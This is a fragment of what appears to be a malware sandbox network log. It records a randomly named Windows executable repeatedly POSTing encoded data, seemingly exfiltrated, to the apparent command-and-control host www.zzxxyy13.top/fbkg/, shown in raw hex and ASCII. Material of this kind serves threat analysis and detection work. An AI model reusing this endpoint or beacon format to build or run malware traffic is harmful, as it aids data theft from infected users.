                                                                                                                                                                                                Data Ascii: T6I=kj1kKHJ/ykWbDmhfvcfbiX00pDDqtjdzYB60I6bEYTMwTZa/eye6qC62bww6o3R3yLVRB3gEx80Fg4TLH4CuWZWexs+thCl4J3bwyDsmjtQNqBlkJzVi7aWEMgUmVF/rCZthGim47lUHz2VZCCUYwSAGIJ7qoVao7TWZ+u7znShfcNbXRQMpqRpclBi3sJKX/42kd5uxCFETH9wdBLFbucZ+goChsCbKzUDfDQ+YT/UwKcCvF6IkEAdsdecVkA/7V85HJxxpTAN4znF3m6D/voM1fHbmzJP8bkRZdVpfzSfZKNKZpoa0ZG29lIAmUkmpTwMa8Raelg5XrOp+gKP7/ONS6pSsVxDuUS/U2tFiyGpAsycCSVXXs7gpL5ymppFd1tLnzDz4ule4hq7amlNI3mtJHRpGxYzfuG9diaV0BW/+8kW6x+J5CvNJ0WyxoRbyiQK/LFE4aQeRkNBmLply80i7nV/MSKQ8lSTz/JfaGqygVuVyCerjfYwWBt79bGAjVaulbbM=
                                                                                                                                                                                                Nov 17, 2023 19:30:02.604366064 CET853INHTTP/1.1 404 Not Found
                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                Date: Fri, 17 Nov 2023 18:30:06 GMT
                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                Content-Length: 548
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                                                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                36192.168.11.2050163160.202.170.2180C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:30:02.279953957 CET853OUTPOST /fbkg/ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.zzxxyy13.top
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Length: 524
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Origin: http://www.zzxxyy13.top
                                                                                                                                                                                                Referer: http://www.zzxxyy13.top/fbkg/
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Data Raw: 54 36 49 3d 6b 6a 31 6b 4b 48 4a 2f 79 6b 57 62 44 6d 68 66 76 63 66 62 69 58 30 30 70 44 44 71 74 6a 64 7a 59 42 36 30 49 36 62 45 59 54 4d 77 54 5a 61 2f 65 79 65 36 71 43 36 32 62 77 77 36 6f 33 52 33 79 4c 56 52 42 33 67 45 78 38 30 46 67 34 54 4c 48 34 43 75 57 5a 57 65 78 73 2b 74 68 43 6c 34 4a 33 62 77 79 44 73 6d 6a 74 51 4e 71 42 6c 6b 4a 7a 56 69 37 61 57 45 4d 67 55 6d 56 46 2f 72 43 5a 74 68 47 69 6d 34 37 6c 55 48 7a 32 56 5a 43 43 55 59 77 53 41 47 49 4a 37 71 6f 56 61 6f 37 54 57 5a 2b 75 37 7a 6e 53 68 66 63 4e 62 58 52 51 4d 70 71 52 70 63 6c 42 69 33 73 4a 4b 58 2f 34 32 6b 64 35 75 78 43 46 45 54 48 39 77 64 42 4c 46 62 75 63 5a 2b 67 6f 43 68 73 43 62 4b 7a 55 44 66 44 51 2b 59 54 2f 55 77 4b 63 43 76 46 36 49 6b 45 41 64 73 64 65 63 56 6b 41 2f 37 56 38 35 48 4a 78 78 70 54 41 4e 34 7a 6e 46 33 6d 36 44 2f 76 6f 4d 31 66 48 62 6d 7a 4a 50 38 62 6b 52 5a 64 56 70 66 7a 53 66 5a 4b 4e 4b 5a 70 6f 61 30 5a 47 32 39 6c 49 41 6d 55 6b 6d 70 54 77 4d 61 38 52 61 65 6c 67 35 58 72 4f 70 2b 67 4b 50 37 2f 4f 4e 53 36 70 53 73 56 78 44 75 55 53 2f 55 32 74 46 69 79 47 70 41 73 79 63 43 53 56 58 58 73 37 67 70 4c 35 79 6d 70 70 46 64 31 74 4c 6e 7a 44 7a 34 75 6c 65 34 68 71 37 61 6d 6c 4e 49 33 6d 74 4a 48 52 70 47 78 59 7a 66 75 47 39 64 69 61 56 30 42 57 2f 2b 38 6b 57 36 78 2b 4a 35 43 76 4e 4a 30 57 79 78 6f 52 62 79 69 51 4b 2f 4c 46 45 34 61 51 65 52 6b 4e 42 6d 4c 70 6c 79 38 30 69 37 6e 56 2f 4d 53 4b 51 38 6c 53 54 7a 2f 4a 66 61 47 71 79 67 56 75 56 79 43 65 72 6a 66 59 77 57 42 74 37 39 62 47 41 6a 56 61 75 6c 62 62 4d 3d
                                                                                                                                                                                                Data Ascii: T6I=kj1kKHJ/ykWbDmhfvcfbiX00pDDqtjdzYB60I6bEYTMwTZa/eye6qC62bww6o3R3yLVRB3gEx80Fg4TLH4CuWZWexs+thCl4J3bwyDsmjtQNqBlkJzVi7aWEMgUmVF/rCZthGim47lUHz2VZCCUYwSAGIJ7qoVao7TWZ+u7znShfcNbXRQMpqRpclBi3sJKX/42kd5uxCFETH9wdBLFbucZ+goChsCbKzUDfDQ+YT/UwKcCvF6IkEAdsdecVkA/7V85HJxxpTAN4znF3m6D/voM1fHbmzJP8bkRZdVpfzSfZKNKZpoa0ZG29lIAmUkmpTwMa8Raelg5XrOp+gKP7/ONS6pSsVxDuUS/U2tFiyGpAsycCSVXXs7gpL5ymppFd1tLnzDz4ule4hq7amlNI3mtJHRpGxYzfuG9diaV0BW/+8kW6x+J5CvNJ0WyxoRbyiQK/LFE4aQeRkNBmLply80i7nV/MSKQ8lSTz/JfaGqygVuVyCerjfYwWBt79bGAjVaulbbM=
                                                                                                                                                                                                Nov 17, 2023 19:30:02.604366064 CET853INHTTP/1.1 404 Not Found
                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                Date: Fri, 17 Nov 2023 18:30:06 GMT
                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                Content-Length: 548
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                                                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                37192.168.11.2050164160.202.170.2180C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:30:05.124326944 CET859OUTPOST /fbkg/ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.zzxxyy13.top
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Length: 52912
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Origin: http://www.zzxxyy13.top
                                                                                                                                                                                                Referer: http://www.zzxxyy13.top/fbkg/
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Data Raw: 54 36 49 3d 6b 6a 31 6b 4b 48 4a 2f 79 6b 57 62 44 6d 68 66 76 63 66 62 69 58 30 30 70 44 44 71 74 6a 64 7a 59 42 36 30 49 36 62 45 59 54 30 77 54 50 75 2f 52 78 32 36 6c 69 36 32 53 51 77 2f 6f 33 51 72 79 4c 64 4f 42 33 39 2f 78 2b 4d 46 67 76 50 4c 47 4f 65 75 54 5a 57 54 39 4d 2b 6a 7a 79 6c 73 4a 33 58 6b 79 43 49 51 69 65 4d 4e 74 44 39 6b 4f 45 35 74 6d 36 58 75 4d 67 56 70 66 6c 2b 63 43 5a 34 36 47 69 36 34 37 67 63 48 68 77 5a 5a 45 56 34 59 6f 53 41 46 42 70 37 6c 68 31 61 72 37 54 43 6e 2b 75 36 45 6e 58 46 66 63 50 6a 58 53 58 51 32 76 42 70 63 36 78 69 77 37 35 47 54 2f 38 57 43 64 36 79 78 43 48 45 54 57 74 77 64 44 76 78 59 6d 63 5a 34 6b 6f 44 6a 36 79 6e 43 7a 55 48 68 44 56 4f 59 54 4c 45 77 4c 72 57 76 41 62 49 6b 45 67 64 71 5a 65 64 4a 76 67 2b 36 56 38 70 6c 4a 77 52 35 54 48 39 34 77 48 6c 33 69 62 44 38 76 49 4d 7a 44 58 62 4a 34 70 44 77 62 6c 67 47 64 56 70 78 7a 58 6e 5a 4b 64 57 5a 6f 70 61 72 55 32 32 36 73 6f 41 4a 43 55 71 6e 54 77 34 43 38 53 61 33 6c 6a 56 58 35 2b 70 2b 72 4e 6a 34 33 2b 4e 5a 34 70 53 79 52 78 44 35 55 53 7a 6d 32 73 77 58 79 57 46 41 73 43 73 43 45 6c 58 59 6e 37 67 74 42 5a 79 67 74 70 46 64 31 74 50 53 7a 44 50 34 76 51 61 34 67 59 7a 61 30 6d 6c 49 78 6d 74 50 48 52 6f 41 78 59 2f 38 75 47 31 6e 69 62 6c 4e 42 56 54 2b 2f 33 65 36 79 2f 4a 36 54 50 4e 41 77 57 7a 6f 31 42 6e 6c 69 51 57 4a 4c 42 59 53 62 6a 71 52 6c 4f 70 6d 5a 5a 6c 78 34 55 69 38 69 6c 2f 57 46 61 56 6c 6c 54 2f 4a 2f 4e 66 4b 47 74 4f 67 57 49 49 32 65 73 37 38 47 71 4d 71 44 6f 6e 62 56 55 63 35 51 4b 61 30 47 50 68 2f 30 36 48 68 4e 77 37 66 6c 62 71 4b 63 39 6e 56 2b 65 63 70 59 71 32 50 4c 4a 78 75 35 59 67 73 53 57 67 51 6c 57 4e 49 6e 34 39 65 74 54 51 70 32 4b 58 79 68 51 4c 35 33 4d 44 32 5a 79 55 67 30 6b 72 2f 71 6a 38 72 66 55 69 52 53 55 67 48 4c 71 47 62 30 45 51 71 4f 65 57 6f 77 36 51 54 63 69 46 79 72 78 76 63 39 6b 37 63 69 2b 35 62 56 33 6c 69 4f 47 4a 74 46 4c 46 65 6c 58 4c 58 30 41 65 74 65 74 6c 65 48 4a 50 67 76 30 58 78 42 36 66 6e 44 78 61 75 67 6a 72 72 2b 75 6a 4c 4b 47 53 77 6a 77 73 35 4f 44 70 56 4b 32 52 38 70 65 46 45 65 69 4d 37 36 37 45 34 41 6d 4a 59 58 6b 62 79 48 31 55 39 36 58 33 39 59 50 78 65 65 32 41 48 7a 30 7a 34 41 79 6e 41 76 71 70 43 36 4e 30 36 77 33 4f 64 72 50 6c 4c 37 41 32 53 56 64 61 58 42 4b 78 6c 4e 44 4d 74 52 43 48 33 41 71 72 44 63 48 71 5a 70 6a 78 6e 37 53 37 59 58 6e 6f 6a 41 6c 49 38 41 32 32 50 5a 64 5a 6e 6f 54 6d 65 59 6e 50 6f 34 2f 31 4a 75 58 51 67 67 6a 4b 34 64 70 2b 74 46 6b 49 36 50 75 2b 47 4f 61 56 31 63 42 42 49 74 45 34 6b 4a 6f 65 50 4a 30 6e 79 48 7a 75 33 4c 79 68 6f 77 37 7a 71 72 77 53 63 6c 67 38 6f 51 52 70 6b 4e 2f 32 2f 44 4e 73 35 61 62 64 61 4e 6d 59 73 56 34 6e 46 49 65 52 4f 78 75 76 77 55 2b 65 56 43 50 77 75 72 33 55 54 35 69 68 74 53 76 75 65 78 62 73 4b 74 74 74 4c 39 58 45 47 59 39 6b 42 6a 32 42 41 5a 52 31 47 4f 49 64 5a 34 34 30 34 71 4e 6e 65 67 37 2b 6a 63 5a 6d 56 4c 4b 38 64 53 6c 5a 79 44 30 4f 72 42 32 48 78 45 76 66 76 69 47 35 52 6e 4c 55 67 38 79 67 63 79 79 71 75 6d 50 5a 6e 33 30 7a 76 59 48 76 6d 70 7a 4d 46 77 37 66 2f 35 75 36 53 6a 59 54 66 6a 32 77 71 79 32 34 5a 51 4e 49 79 35 55 31 55 69 45 45 48 51 32 56 58 4b 6c 78 34 5a 58 52 64 41 44 51 34 2f 2f 6f 55 49 34 36 79 2b 53 48 31 4d 66 6e 67 44 4c 2f 6b 35 66 72 6d 71 6f 65 34 47 47 58 35 4e 4c 49 48 71 50 6f 54 34 62 62 64 7a 63 2b 61 39 50 72 55 4f 51 55 62 48 45 47 7a 76 78 6c 69 4a 79 4a 4c 6f 34 75 4d 30 2f 6d 54 2f 48 38 45 67 4b 71 79 4b 62 45 6f 54 66 49 43 74 61 43 35 50 72 64 76 48 44 5a 54 61 4e 42 57 72 6d 54 6e 31 4f 52 78 6a 51 62 74 71 6c 73 46 4d 49 4e 67 2f 4a 6d 58 57 2f 47 75 36 65 58 35 35 4e 50 70 39 49 2b 51 6d 68 4a 36 2b 59 61 56 2b 39 31 70 61 59 43 73 74 35 6b 34 38 49 76 51 4b 46 54 5a 58 54 6b 70 65 7a 77 37 77 44 75 70 6f 51 79 7a 62 6e 64 61 57 6b 69 61 42 51 4d 36 4c 66 4b 51 6b 52 43 4e 7a 5a 72 72 50 34 69 4a 4b 57 48 39 41 70 56 52 58 78 6e 67 55 51 6f 55 79 61 30 6b 39 43 51 42 47 35 6e 56 37 46 38 61 64 6f 6d 32 71 46 62 65 49 73 42 6f 48 55 53 6f 63 58 78 73 36 4d 48 7a 59 7a 46 4d 49 57 35
                                                                                                                                                                                                Data Ascii: T6I=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
                                                                                                                                                                                                Nov 17, 2023 19:30:05.124401093 CET861OUTData Raw: 68 74 6c 38 68 71 31 52 36 62 32 68 44 6e 6b 62 72 38 7a 54 50 78 6a 43 6d 38 48 6c 6c 32 52 79 69 49 38 4f 66 39 77 59 79 77 41 74 44 72 42 64 63 38 77 4c 55 6c 66 4b 66 74 44 63 2b 45 6c 79 51 56 4e 79 78 53 47 74 58 48 6e 6b 4d 56 67 64 75 44
                                                                                                                                                                                                Data Ascii: htl8hq1R6b2hDnkbr8zTPxjCm8Hll2RyiI8Of9wYywAtDrBdc8wLUlfKftDc+ElyQVNyxSGtXHnkMVgduDXVOzbYaiNrFl7l4TamPiOHw+EiubTd0WxwSuNSdZ8zxH/R/MsxdMOvCEvBFrYV1Dbbmyw7B7G+J5TuNV23GyuuHQINvNTKvPciMqn8LcPNIBpIdBXggPK8TFCJl87kDMN5hbITa229iuRNJtrsgiJvDjHQ4Qx/vuj
                                                                                                                                                                                                Nov 17, 2023 19:30:05.445769072 CET864OUTData Raw: 46 4d 6b 46 77 4b 7a 57 56 57 30 4e 4a 33 43 37 2b 70 35 66 75 42 62 56 50 75 36 77 52 4a 7a 42 58 6c 4d 6a 4d 65 58 73 36 55 52 6e 52 69 47 54 69 59 66 31 49 4c 41 37 68 51 61 53 34 66 62 4c 33 4f 2b 55 41 68 55 68 72 6d 65 56 73 43 6a 76 31 76
                                                                                                                                                                                                Data Ascii: FMkFwKzWVW0NJ3C7+p5fuBbVPu6wRJzBXlMjMeXs6URnRiGTiYf1ILA7hQaS4fbL3O+UAhUhrmeVsCjv1vE7B7nLK+u3UnEymjflUTbXN68bCjrEZkbXQKYoW0SKYqQPrKg5TwLin6DvCtL8aYnDolL3iSRhtmQzNua6hmnb1yEUv3cnUTa0Co9MrK/rw0b+JLQQn6W2U3q2Q9ENsA3qiYq0S2sWyReOUYMKPhhDUQNRZHafbCT
                                                                                                                                                                                                Nov 17, 2023 19:30:05.445954084 CET877OUTData Raw: 2b 73 44 7a 63 4a 39 6f 4f 45 63 69 4c 57 6e 63 36 30 32 30 44 68 34 6a 6d 6b 56 37 61 67 47 42 2f 6e 68 56 6b 39 54 68 4c 70 36 57 47 68 65 6b 71 4b 39 32 34 37 7a 6f 69 6e 70 36 4a 42 58 62 6b 61 32 6f 64 33 6d 52 66 55 66 4f 39 37 53 4e 52 52
